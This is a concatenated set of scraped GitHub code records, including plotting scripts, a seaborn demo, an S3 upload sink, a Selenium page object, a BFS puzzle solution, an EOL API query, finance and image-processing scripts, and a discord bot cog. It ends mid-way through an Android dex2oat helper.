scale by an appropriate factor to ensure \n# the final plot doesn't have any parts overlapping\nindex = np.arange(num_concepts) * bar_width\nprint('Index:',index)\nmy_colors = mcolors.TABLEAU_COLORS\nnames = list(my_colors)\nprint('Colors to choose:',names)\nbar_x = []\nplot_conceptNames = ['MA','HE','EX','SE','IRMA','NV']\n#Divide by number of images (50 for each DR level) to get the percentage concept count ranging from 0 to 1\nlevel_0_conceptCounts = [MA_level0_predictions/level0_count,HE_level0_predictions/level0_count,HardEx_level0_predictions/level0_count,SoftEx_level0_predictions/level0_count,IRMA_level0_predictions/level0_count,NV_level0_predictions/level0_count]\nlevel_1_conceptCounts = [MA_level1_predictions/level1_count,HE_level1_predictions/level1_count,HardEx_level1_predictions/level1_count,SoftEx_level1_predictions/level1_count,IRMA_level1_predictions/level1_count,NV_level1_predictions/level1_count]\nlevel_2_conceptCounts = [MA_level2_predictions/level2_count,HE_level2_predictions/level2_count,HardEx_level2_predictions/level2_count,SoftEx_level2_predictions/level2_count,IRMA_level2_predictions/level2_count,NV_level2_predictions/level2_count]\nlevel_3_conceptCounts = [MA_level3_predictions/level3_count,HE_level3_predictions/level3_count,HardEx_level3_predictions/level3_count,SoftEx_level3_predictions/level3_count,IRMA_level3_predictions/level3_count,NV_level3_predictions/level3_count]\nlevel_4_conceptCounts = [MA_level4_predictions/level4_count,HE_level4_predictions/level4_count,HardEx_level4_predictions/level4_count,SoftEx_level4_predictions/level4_count,IRMA_level4_predictions/level4_count,NV_level4_predictions/level4_count]\nfor i in range(6):\n bar_x.append(i*bar_width)\n#Plotting the predicted concept counts for DR levels 1-4 \n#In order to compare with the TCAV scores\nfig, ax = plt.subplots(1,4, figsize=(32,8))\n\n#https://matplotlib.org/3.1.0/gallery/subplots_axes_and_figures/subplots_demo.html#sphx-glr-gallery-subplots-axes-and-figures-subplots-demo-py\n#DR level 1\nax[0].bar(bar_x, level_1_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[0].set_title('DR level 1',fontsize=32)\nax[0].set_xticks(bar_x)\nax[0].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[0].set_ylim((0,1.05))\n\n#DR level 2\nax[1].bar(bar_x, level_2_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[1].set_title('DR level 2',fontsize=32)\nax[1].set_xticks(bar_x)\nax[1].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[1].set_ylim((0,1.05))\n\n#DR level 3\nax[2].bar(bar_x, level_3_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[2].set_title('DR level 3',fontsize=32)\nax[2].set_xticks(bar_x)\nax[2].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[2].set_ylim((0,1.05))\n\n#DR level 4\nax[3].bar(bar_x, level_4_conceptCounts, bar_width, label=plot_conceptNames, \n color=['tab:blue','tab:orange','tab:green','tab:red','tab:purple','tab:brown'])\nax[3].set_title('DR level 4',fontsize=32)\nax[3].set_xticks(bar_x)\nax[3].set_xticklabels(plot_conceptNames, rotation = 75,fontsize=32)\nax[3].set_ylim((0,1.05))\n\nax[0].set_ylabel('Concept count',fontsize=32)\nax[0].set_yticklabels([0.0,0.2,0.4,0.6,0.8,1.0],fontsize=32)\n# Hide x labels and tick labels for top plots and y ticks for right 
plots.\nax[1].label_outer()\nax[2].label_outer()\nax[3].label_outer()\n\n\n#Shrink the space between the subplots:\nplt.subplots_adjust(wspace=0.1)\nplt.savefig('PlotBottleneckConceptCounts_FGADRTestset_subplots.png', bbox_inches = 'tight')\n","repo_name":"AndreaStoraas/ConceptExplanations_DR_grading","sub_path":"SequentialBottleneck_experiments/PlotConceptPredictions_FGADRTestset.py","file_name":"PlotConceptPredictions_FGADRTestset.py","file_ext":"py","file_size_in_byte":10311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37407092455","text":"# Demo code to show how to use pandas and seaborn\r\nimport seaborn as sns\r\n\r\n\r\n# loads test data\r\niris_df = sns.load_dataset(\"iris\") # ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']\r\n\r\n\r\n\r\nprint(iris_df.columns) # Get your df columns\r\n\r\n# stores only the species\r\nspecies = iris_df[\"species\"]\r\nprint(species)\r\n\r\n# stores only the measurement info\r\npetal_info = iris_df[[\"sepal_length\", \"sepal_width\", \"petal_length\", \"petal_width\"]]\r\nprint(petal_info)\r\n\r\n# stores the rows with sepal length smaller than 4.5\r\nsmall_sepal_length = iris_df[iris_df[\"sepal_length\"] < 4.5 ]\r\nprint(small_sepal_length)\r\n\r\n\r\n# stores the mean sepal width per species\r\nmean_sepal_width = iris_df.groupby(\"species\")[\"sepal_width\"].mean()\r\nprint(mean_sepal_width)\r\n\r\n\r\n# import matplotlib to display charts\r\nimport matplotlib.pyplot as plt\r\n\r\n# Shows the bar chart of sepal width average per species\r\nplt.figure()\r\n# passes data to display to the barplot method\r\n# sns.barplot(x=\"sepal_width\", y=\"species\", data=iris_df)\r\n\r\nsns.scatterplot(x=\"sepal_length\", y=\"sepal_width\", data=iris_df)\r\n\r\n# displays chart \r\nplt.show()\r\n\r\n# This will return a histogram\r\nsns.histplot(data=iris_df, x=\"sepal_width\") # Histogram\r\nplt.show()\r\n# This will return a boxplot\r\nsns.boxplot(y=iris_df[\"sepal_width\"])\r\n\r\n# Box plot using plt\r\n\r\nplt.boxplot(iris_df[\"sepal_width\"]) # Matplotlib ###\r\nplt.show()\r\n# Violin plot\r\n\r\nsns.violinplot(y=iris_df[\"sepal_length\"])\r\nplt.show()\r\n# Countplot\r\n\r\nsns.countplot(x='species', data=iris_df)\r\nplt.show()\r\n\r\n# Pairplot\r\nsns.pairplot(iris_df);","repo_name":"HyperionDevBootcamps/C4_DS_lecture_examples","sub_path":"Lecture code/Data Analysis and Visualisation/data_visualisations_examples.py","file_name":"data_visualisations_examples.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"36"} +{"seq_id":"70050077863","text":"import os\nimport tempfile\nfrom typing import Iterator, List, Optional, Tuple\n\nimport boto3\n\nfrom pipereport.base.sink import BaseSink\n\n\nclass S3Sink(BaseSink):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        client_args = {\"service_name\": \"s3\"}\n        endpoint_url = kwargs.pop(\"endpoint_url\", None)\n        if endpoint_url is not None:\n            client_args[\"endpoint_url\"] = endpoint_url\n        client_args[\"aws_access_key_id\"] = self.required_credential(\"aws_access_key_id\")\n        client_args[\"aws_secret_access_key\"] = self.required_credential(\n            \"aws_secret_access_key\"\n        )\n        self.client_args = client_args\n\n        self.bucket = self.required_field(\"bucket\")\n\n        self.session = None\n        self.s3 = None\n\n    def connect(self):\n        self.session = boto3.session.Session()\n        self.s3 = self.session.client(**self.client_args)\n\n    def 
write_block(\n self,\n source_iterator: Iterator[Tuple],\n object_id: str,\n blocksize: int = -1,\n columns: Optional[List[str]] = None,\n sep: str = \"\\t\",\n ):\n self.telemetry.add_object(object_id, columns)\n with tempfile.TemporaryDirectory() as tmpdirname:\n cachefiledir = os.path.join(tmpdirname, os.path.dirname(object_id))\n if cachefiledir and not os.path.exists(cachefiledir):\n os.makedirs(cachefiledir)\n cachefile = os.path.join(tmpdirname, object_id)\n with open(cachefile, \"w\") as cache:\n block_written = 0\n for entry in source_iterator:\n cache.write(sep.join(entry) + \"\\n\")\n block_written += 1\n if block_written == blocksize:\n break\n self.telemetry.add_entries(object_id, block_written)\n self.s3.upload_file(cachefile, self.bucket, object_id)\n","repo_name":"enchantner/pipereport","sub_path":"pipereport/sink/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37722790950","text":"'''\n商品浏览\n'''\n\nfrom common.base import Base\nfrom time import sleep\nurl = \"http://ecshop.itsoso.cn/\"\n\nclass Goodslist_Page(Base):\n \"\"\"封装表现层:制作定位器\"\"\"\n # 首页元素的定位\n first_page_loc = (\"link text\", \"首页\")\n send_loc = (\"name\", \"keywords\")\n search_loc = (\"value\", \"搜索\")\n\n\n def click_first(self):\n \"\"\"点击首页\"\"\"\n self.click(self.first_page_loc)\n\n def get_goods_text(self, locator):\n \"\"\"获取商品文本\"\"\"\n goods_elements = self.find_elements(locator)\n texts = []\n for goods_element in goods_elements:\n text = goods_element.text # 获取单个商品的文本\n texts.append(text)\n return texts\n\n def click_texts(self, locator1,locator2):\n \"\"\"\n\n :param locator1: 商品类的元素定位器\n :param locator2: 商品列表的定位器\n :return:\n \"\"\"\n # 取出商品类的所有文本\n texts = self.get_goods_text(locator1)\n for text in texts:\n good_loc = (\"link text\", text)\n self.click(good_loc)\n self.click_all_element(locator2)\n\n def get_goods_title(self, locator):\n \"\"\"获取商品标题\"\"\"\n goods_elements = self.find_elements(locator)\n # 获取商品标题\n titles = [] # 准备一个列表装商品标题\n for goods_element in goods_elements:\n # title就是表示元素的属性值\n title = goods_element.get_attribute(\"title\")\n titles.append(title)\n return titles\n\n def click_all_element(self, locator):\n \"\"\"点击所有元素\"\"\"\n titles = self.get_goods_title(locator)\n for title in titles:\n # 重新制作单个商品的定位器\n goods_loc = (\"css selector\", f\"a[title='{title}']\")\n self.click(goods_loc)\n self.back()\n self.next_page()\n\n def next_page(self):\n # 下一页的定位器\n next_loc = (\"link text\", \"下一页\")\n # 点击下一页\n # 判断有没有下一页的元素,有就点击元素,没有就返回首页\n while True:\n if self.displayed(next_loc):\n self.click(next_loc)\n else:\n self.click(self.first_page_loc)\n break\n\n\n def input_goods(self,text):\n \"\"\"输入搜索商品名\"\"\"\n self.send_keys(self.send_loc,text)\n\n def click_search(self):\n \"\"\"点击搜索按钮\"\"\"\n self.click(self.search_loc)\n\nif __name__ == '__main__':\n from common.base import open_browser\n\n driver = open_browser()\n goods = Goodslist_Page(driver) # 实例化login page\n goods.open_url(url) # 打开网址\n goods.click_first() # 点击首页\n categary_loc = (\"css selector\", \"div.cat-box>div.cat1>a\") # 商品类的定位器\n goods_loc = (\"css selector\", \"div.goods-title>a\") # 商品列表的定位器\n goods.click_texts(categary_loc, goods_loc) # 
点击商品类\n","repo_name":"15008477526/-","sub_path":"web_aaaaaaaa/page/goods_list_page.py","file_name":"goods_list_page.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28923311211","text":"#1194. 달이 차오른다, 가자!\n\"\"\"\nBitmasking + BFS Technique \n\n상태공간의 정의 \n\ndists[i][j][key] = (i,j)인데 현재 status가 key인 것.\n\"\"\"\n\nimport sys \ninput = sys.stdin.readline \nfrom collections import deque \n\nN,M = map(int, input().rstrip().split())\n\nboards = []\nstart = (-1,-1)\nends = []\n\ndists = [[[-1] * M for _ in range(N)] for _ in range(64)]\n\nfor row in range(N):\n each_row = list(input().rstrip())\n boards.append(each_row)\n for col in range(M):\n if each_row[col] == \"0\" : \n start = (row,col)\n elif each_row[col] == \"1\" :\n ends.append((row,col))\n\n \n \n#방문 로직은 bfs 함수에서 검증하자!\n\"\"\"\n2500 * 64\n\n\n- RangeOut / Visit 여부 확인\n\n- Key가 있을 때 방문가능 여부 확인! (status check)\n\n\"\"\"\n\ns_row, s_col = start\n\ndists[0][s_row][s_col] = 0\ndeq = deque([(0,s_row,s_col)])\n\ndx = [-1,1,0,0]\ndy = [0,0,1,-1]\n\n\n\n\ndef bfs(deq, dist):\n while deq:\n key, cur_x, cur_y = deq.popleft()\n # print(f\"key:{key}, cur_x:{cur_x}, cur_y:{cur_y}, distance: {dists[key][cur_x][cur_y]}\")\n for i in range(4):\n nx = cur_x + dx[i] ; ny = cur_y + dy[i]\n #Rangeout, Visit, Wall 무시\n if nx<0 or ny<0 or nx>=N or ny>=M : continue \n if boards[nx][ny] == \"#\" : continue\n if dists[key][nx][ny]>=0: \n continue\n \n if boards[nx][ny].islower():\n order = ord(boards[nx][ny])-97\n new_key = (key | (1<(r:Resource), \\\n\t\t\t(t)-[:predicate]->(pred:Term) \\\n\t\tWHERE p.canonical = '\" + name + \"'\"\\\n\t\t\"OPTIONAL MATCH (t)-[:units_term]->(units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:object_term]->(obj:Term) \\\n\t\tOPTIONAL MATCH (t)-[:normal_units_term]->(normal_units:Term) \\\n\t\tOPTIONAL MATCH (t)-[:sex_term]->(sex:Term) \\\n\t\tOPTIONAL MATCH (t)-[:lifestage_term]->(lifestage:Term) \\\n\t\tOPTIONAL MATCH (t)-[:statistical_method_term]->(stats:Term) \\\n\t\tRETURN p.canonical, pred.name, obj.name, t.literal, t.measurement, units.name, t.normal_measurement, normal_units.name, sex.name, lifestage.name, stats.name, stats.comment, r.resource_id, p.page_id, t.eol_pk, t.source \\\n\t\tLIMIT 500\"\n\ndata = {\"query\" : query,\n\t\t\"format\" : \"cypher\"}\n\n# Send api call\nr = requests.get(eol_base_url,\n\t\t\t\theaders = {\"accept\" : \"application/json\",\n\t\t\t\t\t\t\t\"authorization\" : \"JWT \" + eol_tok},\n\t\t\t\tparams = data)\n\nj = r.json()\n\n# Convert to df\ndf = pd.DataFrame(j[\"data\"])\ndf.columns = j[\"columns\"]\n\n# Drop rows where source is anage or iucn\ndf[\"t.source\"] = df[\"t.source\"].fillna(value = \"NA\")\ndf[\"Ignore_source\"] = [1 if any(s in x for s in[\"genomics.senescence\", \"iucn\"]) else 0 for x in df[\"t.source\"].tolist()]\n\ndf = df[df[\"Ignore_source\"] != 1]\n\ndf_datafields = df[\"pred.name\"].unique().tolist()\n\n# Extract relevant data\n# Habitat related data\nif \"habitat includes\" in df_datafields:\n\toutput[\"habitat\"][\"habitats\"] = df.loc[df[\"pred.name\"] == \"habitat includes\", \"obj.name\"].unique().tolist()\n\n# Pretty much countries of occurence but sum within county data too...\nif \"geographic distribution includes\" in df_datafields:\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"value\"] = df.loc[df[\"pred.name\"] == \"geographic distribution includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"countries_of_occurrence\"][\"unit\"] = \"Extant in 
country\"\n\n# Native range\nif \"native range includes\" in df_datafields:\n\toutput[\"habitat\"][\"native_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"native range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"native_range\"][\"unit\"] = \"Locations where the species is native\"\n\n# Introduced locations\nif \"introduced range includes\" in df_datafields:\n\toutput[\"habitat\"][\"introduced_range\"][\"value\"] = df.loc[df[\"pred.name\"] == \"introduced range includes\", \"obj.name\"].tolist()\n\toutput[\"habitat\"][\"introduced_range\"][\"unit\"] = \"Locations where the species has been introduced\"\n\n\nif \"body mass\" in df_datafields:\n\tif df.loc[(df[\"pred.name\"] == \"body mass\") &\n\t\t\t\t(df[\"lifestage.name\"].isnull()) &\n\t\t\t\t(df[\"stats.name\"] == \"max\"),:].shape[0] > 0:\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"t.normal_measurement\"].values[0]\n\t\toutput[\"life_history_traits\"][\"bodymass\"][\"adult_bodymass\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"body mass\") & (df[\"lifestage.name\"].isnull()) & (df[\"stats.name\"] == \"max\"), \"normal_units.name\"].values[0]\n\n\nprint (json.dumps(output, indent=4, sort_keys=False))\n# May be more data, depends on species searched for...\n# Generally not much for parrots.\n\n# Not normally in reduced df\n# Population trend\n# if \"population trend\" in df_datafields:\n# \toutput[\"population\"][\"population_trend\"][\"value\"] = df.loc[df[\"pred.name\"] == \"population trend\", \"t.literal\"].values[0]\n\n# # Weights/bodymass??\n# if \"weight\" in df_datafields:\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"),:].shape[0] > 0:\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"value\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"t.normal_measurement\"].values[0]\n# \t\toutput[\"bodymass\"][\"adult_bodymas\"][\"unit\"] = df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"adult\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"weanling\"), \"normal_units.name\"].values[0]\n# \tif df.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"),:].shape[0] > 0:\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), \"t.normal_measurement\"].values[0]\n# \t\tdf.loc[(df[\"pred.name\"] == \"weight\") & (df[\"lifestage.name\"] == \"neonate stage\"), \"normal_units.name\"].values[0]\n","repo_name":"ConMine/ConMine","sub_path":"Development/Code/eol.py","file_name":"eol.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"23400386130","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nos.chdir('C:\\\\Users\\\\sachi\\\\.vscode\\\\GitHubRepos\\\\OSCV_Exercises')\nexetasknum = 1\n\nif exetasknum==1:\n img = cv2.imread('opencv-logo-white.png',0)\n img = cv2.medianBlur(img,5)\n cimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\n\n circles = 
cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,20,\n param1=50,param2=30,minRadius=0,maxRadius=0)\n # apparently, Param2 changes the number of circles detected\n circles = np.uint16(np.around(circles))\n for i in circles[0,:]:\n # draw the outer circle\n cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)\n # draw the center of the circle\n cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)\n\n cv2.imshow('detected circles',cimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"sachingadgil/OSCV_Exercises","sub_path":"OpenCV_Python_Tutorials/029 Hough Circle Transform.py","file_name":"029 Hough Circle Transform.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34427295995","text":"class Solution(object):\n def rearrangeBarcodes(self, barcodes):\n \"\"\"\n :type barcodes: List[int]\n :rtype: List[int]\n \"\"\"\n \n freqs = {}\n for b in barcodes:\n \tif not b in freqs:\n \t\tfreqs[b] = 0\n \tfreqs[b] += 1\n\n max_freq = 0\n for c in freqs:\n \tmax_freq = max_freq(freqs[c], max_freq)\n\n ","repo_name":"MuhammadAbuBakar95/Problem-Solving","sub_path":"two-heaps/rearrangeBarcodes.py","file_name":"rearrangeBarcodes.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"422298693","text":"import yfinance as yf\nimport pandas as pd\nimport datetime\nimport altair as alt\n\n\ndef get_data(ticker, start_date, end_date):\n ticker_data = yf.Ticker(ticker)\n df = ticker_data.history(start=start_date, end=end_date).reset_index()[\n [\"Date\", \"Close\", \"Dividends\"]]\n df[\"Close\"] = yf.download(ticker, start_date, end_date)[\"Close\"].values\n return df\n\n\ndef modify_data(initial_investment, df):\n df.loc[0, \"Shares - Not Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n df.loc[0, \"Shares - Reinvested\"] = initial_investment / df.loc[0, \"Close\"]\n\n for i in range(len(df) - 1):\n df.loc[i+1, \"Shares - Reinvested\"] = df.loc[i, \"Shares - Reinvested\"] + \\\n (df.loc[i+1, \"Dividends\"] *\n df.loc[i, \"Shares - Reinvested\"]) / df.loc[i+1, \"Close\"]\n df.loc[i+1, \"Shares - Not Reinvested\"] = df.loc[i,\n \"Shares - Not Reinvested\"]\n\n df[\"Value - Reinvested\"] = df[\"Shares - Reinvested\"] * df[\"Close\"]\n df[\"Cash Dividends\"] = (df[\"Shares - Not Reinvested\"]\n * df[\"Dividends\"]).cumsum()\n df[\"Value - Not Reinvested\"] = df[\"Shares - Not Reinvested\"] * \\\n df[\"Close\"] + df[\"Cash Dividends\"]\n\n return df\n\n\ndef get_benchmark(benchmark_ticker, start_date, end_date, initial_investment):\n df = yf.download(benchmark_ticker, start_date, end_date)[\n \"Close\"].reset_index()\n\n df[\"Shares\"] = initial_investment / df.loc[0, \"Close\"]\n df[\"Value\"] = df[\"Shares\"] * df[\"Close\"]\n\n return df\n\n\ndef get_plotting_df(benchmark_df, stock_df, benchmark_ticker):\n reinvested_df = stock_df[[\n \"Date\", \"Value - Reinvested\"]].rename(columns={\"Value - Reinvested\": \"Value\"})\n reinvested_df[\"Case\"] = \"Dividends Reinvested\"\n\n not_reinvested_df = stock_df[[\n \"Date\", \"Value - Not Reinvested\"]].rename(columns={\"Value - Not Reinvested\": \"Value\"})\n not_reinvested_df[\"Case\"] = \"Dividends Not Reinvested\"\n\n benchmark_df[\"Case\"] = benchmark_ticker\n\n plotting_df = pd.concat(\n (reinvested_df, not_reinvested_df, benchmark_df[[\"Date\", \"Value\", \"Case\"]]))\n\n return plotting_df\n\n\ndef get_chart(data):\n hover = alt.selection_single(\n 
fields=[\"Date\"],\n nearest=True,\n on=\"mouseover\",\n empty=\"none\",\n )\n\n lines = (\n alt.Chart(data, title=\"DRIP Return\")\n .mark_line()\n .encode(\n alt.X(\"Date\", scale=alt.Scale(\n zero=False, nice=False), title=\"Date\"),\n alt.Y(\"Value:Q\", scale=alt.Scale(zero=False)),\n color='Case',\n strokeDash='Case'\n )\n )\n\n points = lines.transform_filter(hover).mark_circle(size=65)\n\n tooltips = (\n alt.Chart(data)\n .mark_rule()\n .encode(\n x=\"Date\",\n y=\"Value:Q\",\n opacity=alt.condition(hover, alt.value(0.3), alt.value(0)),\n tooltip=[\n alt.Tooltip(\"Date\", title=\"Date\"),\n alt.Tooltip(\"Value\", title=\"Value\"),\n alt.Tooltip('Case', title=\"Case\")\n ],\n )\n .add_selection(hover)\n )\n return (lines + points + tooltips).interactive()\n\n\nif __name__ == \"__main__\":\n\n ticker = \"XYLD\"\n benchmark_ticker = \"SPY\"\n\n start_date = datetime.datetime.today() - datetime.timedelta(days=2000)\n end_date = datetime.datetime.today()\n\n df = get_data(ticker, start_date, end_date)\n df = modify_data(10000, df)\n benchmark_df = get_benchmark(benchmark_ticker, start_date, end_date, 10000)\n\n plotting_df = get_plotting_df(benchmark_df, df, benchmark_ticker)\n plotting_df[\"Value\"] = plotting_df[\"Value\"].round(decimals=2)\n\n chart = get_chart(plotting_df)\n\n print(chart)\n","repo_name":"victormorizon/financial-superapp","sub_path":"functions/drip_functions.py","file_name":"drip_functions.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15429270600","text":"# montecarlo-tf.py\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n@profile\ndef mondecarlo_pi_tf(iteration):\n trials = iteration\n hits = 0\n\n x = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n y = tf.random_uniform([1],minval=-1,maxval=1,dtype=tf.float32)\n\n sess = tf.Session()\n\n with sess.as_default():\n for i in range(1,trials):\n if x.eval()**2 + y.eval()**2 < 1 :\n hits = hits + 1\n\nmondecarlo_pi_tf(10000)\n","repo_name":"mesmerli/tf-example","sub_path":"performance/montecarlo-pi/kernprof/montecarlo-tf.py","file_name":"montecarlo-tf.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"4252035394","text":"import discord\r\nfrom discord.ext import commands\r\n\r\nclass RoleSetup(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n @commands.Cog.listener()\r\n async def on_ready(self):\r\n print(\"RoleSetup.py is ready!\")\r\n\r\n @commands.command()\r\n async def setup(self, ctx):\r\n try:\r\n embed_var = discord.Embed(title=\"CHOOSE YOUR ROLES!\", description=\r\n \"\\nReact to this message to assign yourself a role!\\n\"\r\n \"\\n⛏️ mind crafters\\n\"\r\n \"🔫 Valorant Gang\\n\"\r\n \"🐉 DnDers\\n\"\r\n \"🎮 EPIC Fortnite Gamers\\n\"\r\n \"🃏 Pokemon TCG Masters\\n\"\r\n \"🧘‍♂️ master meditators\\n\"\r\n \"💪 SHREDDED\\n\", color=discord.Color.red())\r\n\r\n await ctx.send(embed=embed_var)\r\n except Exception as e:\r\n print(\"Error:\", e)\r\n\r\nasync def setup(client):\r\n await client.add_cog(RoleSetup(client))\r\n","repo_name":"brielle5810/sk8_bot","sub_path":"RoleSetup.py","file_name":"RoleSetup.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"20061477493","text":"def ordered_ints(list_of_objects: list):\n new_list = []\n for i in 
list_of_objects:\n if i == ():\n new_list.append(int(len(i)))\n else:\n new_list.append(int(i))\n new_list.sort(reverse=True)\n return new_list\n\n\nprint(ordered_ints([1, True, '123', False, 6, ()]))\ndef sum_of_square(n: int):\n if n == 0:\n return 0\n else:\n return n ** 2 + sum_of_square(n - 1)\n\n\nprint(sum_of_square(10))\ndef factorial_of_squares(n: int):\n if n == 1:\n return 1\n else:\n return n ** 2 * factorial_of_squares(n - 1)\n\n\nprint(factorial_of_squares(3))\ndef process_text(text: str):\n first_text = \"\"\n # second_text = \"\"\n for i in text:\n if i == \" \":\n split_text = text.split(\" \", 1)[0]\n first_text = split_text.upper()\n second_text = text.split(\" \", 1)[1]\n\n for i in second_text:\n if (i != i.lower()) or (i == \" \") or (i == i.isnumeric()):\n second_text = second_text.replace(i, '_')\n\n return (first_text, second_text)\n\n\nprint(process_text('1234567a Text to te5t'))","repo_name":"silvisig/pep20g06","sub_path":"modul3/homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21993855134","text":"import logging\n\nimport torch\nfrom torch import nn\nfrom torch.nn import Module\nfrom torchvision import models\n\n\nclass FeaturePredictorModelWrapper:\n\n def __init__(self, model_state_file: str, feature_extraction: bool):\n self.model_state_file = model_state_file\n\n self.model: Module = models.resnet50(pretrained=True)\n classifier_block_features: int = self.model.fc.in_features\n linear_out_features: int = 128\n self.feature_extraction = feature_extraction\n\n if self.feature_extraction:\n self.freeze_layers()\n else:\n logging.info(\"Fine-tuning: Skipping layer freezing\")\n\n self.model.fc = nn.Sequential(\n nn.Linear(in_features=classifier_block_features, out_features=linear_out_features),\n nn.ReLU(),\n nn.Linear(in_features=linear_out_features, out_features=2)\n )\n\n def freeze_layers(self):\n logging.info(\"Freezing base model parameters for feature extraction\")\n for name, parameter in self.model.named_parameters():\n parameter.requires_grad = False\n\n def load_model_from_file(self, device: str) -> None:\n self.model.load_state_dict(torch.load(self.model_state_file))\n self.model = self.model.to(device)\n\n logging.info(\"Model state loaded from {} to device {}\".format(self.model_state_file, device))\n\n def save_model_state(self):\n torch.save(self.model.state_dict(), self.model_state_file)\n logging.info(\"Model state saved at {}\".format(self.model_state_file))\n","repo_name":"cptanalatriste/birds-of-british-empire","sub_path":"featurepred/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"24206245635","text":"import os\nimport sys\nimport subprocess\n\nTMP_FOLDER = \"/tmp/zip_dex_stuff\"\nONHOST_SYSTEM_ROOT=\"/system\"\nORG_BASE_FOLDER = \"/system\"\nDEOAT_BASE_FOLDER = \"./deoat\"\nOUT_BASE_FOLDER = \"./genoat\"\nBAKSMALI_BASE = \"java -jar ./baksmali-2.3.4.jar\"\nDEX2OAT_BASE = \"./bin/dex2oat\" # CHECK\nARCH = [\n\t# (\"arm\", \"krait\"), # Nexus 6\n\t(\"x86_64\", \"x86_64\"), # Emulator\n\t(\"x86\", \"x86\"), # Emulator\n]\nARCH_BOOT_OAT_PATH = {}\n# ARCH_BOOT_CLASS_PATH = {}\n\ndef mkdir(d):\n os.system(\"mkdir -p \" + d)\n\ndef rmall(d):\n os.system(\"rm -rf \" + d)\n\ndef listfiles(d):\n return [f for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))]\n\ndef 
